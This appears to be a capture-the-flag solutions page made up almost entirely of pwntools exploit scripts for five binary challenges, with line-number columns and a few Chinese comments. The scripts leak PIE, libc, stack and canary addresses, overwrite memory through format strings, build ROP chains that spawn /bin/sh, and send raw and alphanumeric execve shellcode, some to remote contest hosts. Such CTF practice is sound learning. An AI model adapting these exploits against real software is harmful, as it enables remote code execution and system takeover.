ezpie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")
#libc = ELF('./libc-2.31.so')
io = process("./pwn")
#io = remote("43.249.195.138",22588)
def debug():
    gdb.attach(io)
    pause()
#debug()
offset = 88
io.sendafter('your name->','A'*40)
io.recvuntil('A'*40)
a = u64(io.recv(6).ljust(8,b'\x00'))
print('a\t',hex(a))
base_addr = a - 0x120e #泄露的是func的地址
print(hex(base_addr))
main_addr = 0x1254 + base_addr
pop_rax = 0x00000000000012c8 + base_addr
pop_rdi = 0x0000000000001333 + base_addr
binsh = 0x2008 + base_addr
pop_rsi_r15 = 0x0000000000001331 + base_addr
sys_ret = 0x12C5 + base_addr
payload = cyclic(offset)
payload += p64(pop_rax) + p64(0x3b)
payload += p64(pop_rdi)+p64(binsh)
payload += p64(pop_rsi_r15) +p64(0)+p64(0)
payload += p64(sys_ret)
io.sendlineafter('please enter your information-> ',payload)
io.interactive()

fmt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')
#io = process('./pwn')
#libc = ELF("")
io = remote("43.249.195.138",20241)
def debug():
    gdb.attach(io)
    pause()
#code here
#debug()
payload = b'A'*18+b'%8$n'+b'A'*34+b'%9$n'
io.sendlineafter('>',payload)
io.interactive()

stack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')
io = process('./pwn')
#libc = ELF("")
#io = remote("39.106.48.123",36951)
def debug():
    gdb.attach(io,'b read')
    pause()
#code here
#debug()
backdoor_addr = 0x4012E6
pop_rbx = 0x4011bd
ret = 0x40101a
payload = cyclic(0x1c)
payload += b'\x1f'+b'a'*8+p64(ret)+p64(backdoor_addr)
io.sendlineafter('size: ','51')
io.recvuntil('> ')
io.send(payload)
io.interactive()

abstract_shellcode

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from pwn import *
from LibcSearcher import *
import time
from ae64 import AE64
context(
    terminal=["wt.exe","wsl"],
    os = "linux",
    arch = "amd64",
    #arch = "i386",
    log_level="debug",
)
elf = ELF("./pwn")
io = process("./pwn")
#io = remote("43.249.195.138",22164)
def debug():
    gdb.attach(io,'b *$rebase(0x14AA)')
    pause()
debug()

io.recvuntil("input:(ye / no)")
io.send("\x0f\x05")#这里写了啥?
io.recvuntil("---input your pop code---")
payload = "["*2+"\\"+"["+"P"*4+"S"+"Z"+"]"*5+"X"+"\x10"
io.send(payload)
shellcode = cyclic(0x2)+b"\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05"
gdb.attach(io,'b ret')
io.send(shellcode)
io.interactive()

fries

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
from pwn import *
from LibcSearcher import *
context(
    terminal=["wt.exe", "wsl"],
    os = "linux",
    arch ='amd64',
    #arch = "i386",
    log_level='debug'
)
elf = ELF('./pwn')
#io = process('./pwn')
libc = ELF("./libc.so.6")
io = remote("43.249.195.138",22948)
def debug():
    gdb.attach(io)
    pause()
#code here
#debug()
io.recvuntil("Emmmmm... Could you give me some fries")
payload = "fries\x00"
io.send(payload)
io.recvuntil("Go get some fries on the pier")
payload = "%10$s"
io.send(payload)
libc_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-0x21a780
libc.address = libc_addr
success("libc_addr :"+hex(libc_addr))

io.recvuntil("Go get some fries on the pier")
payload = "%21$p"
io.send(payload)
io.recv()
stack_addr = int(io.recv(14),16)
success("stack_addr :"+hex(stack_addr))

io.recvuntil("Go get some fries on the pier")
payload = "%23$p"
io.send(payload)
io.recv()
canary = int(io.recv(18),16)
success("canary :"+hex(canary))

buf = (stack_addr & 0xffff)-0xd0
buf1 = (buf &0xff)+0x8
buf2 = buf>>8
success("buf: "+hex(buf))
success("buf1: "+hex(buf1))
if buf1 == 0:
    io.recvuntil("Go get some fries on the pier")
    payload = b"%9$hhn".ljust(0x8,b'\x00')+p64(stack_addr-0x50)
    # gdb.attach(io,'b *$rebase(0x12D5)')
    io.send(payload)
    # pause()
else:
    io.recvuntil("Go get some fries on the pier")
    payload = (b"%"+str(buf1).encode()+b"c"+b"%10$hhn").ljust(0x10,b'\x00')+p64(stack_addr-0x50)
    # gdb.attach(io,'b *$rebase(0x12D5)')
    io.send(payload)
    # pause()

io.recvuntil("Go get some fries on the pier")
payload = (b"%"+str(buf2).encode()+b"c"+b"%10$hhn").ljust(0x10,b'\x00')+p64(stack_addr-0x50+1)
io.send(payload)

rdi_addr = next(libc.search(asm("pop rdi;ret")))
binsh_addr = next(libc.search(b"/bin/sh"))
system_addr = libc.sym['system']
for i in range(2):
    io.recvuntil("Go get some fries on the pier")
    payload = p64(canary)+cyclic(0x8)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
    # gdb.attach(io,'b *$rebase(0x12D5)')
    io.send(payload)
    # pause()

io.recvuntil("Go get some fries on the pier")
payload = p64(canary)
# gdb.attach(io,'b *$rebase(0x12D5)')
io.send(payload)
# pause()
io.interactive()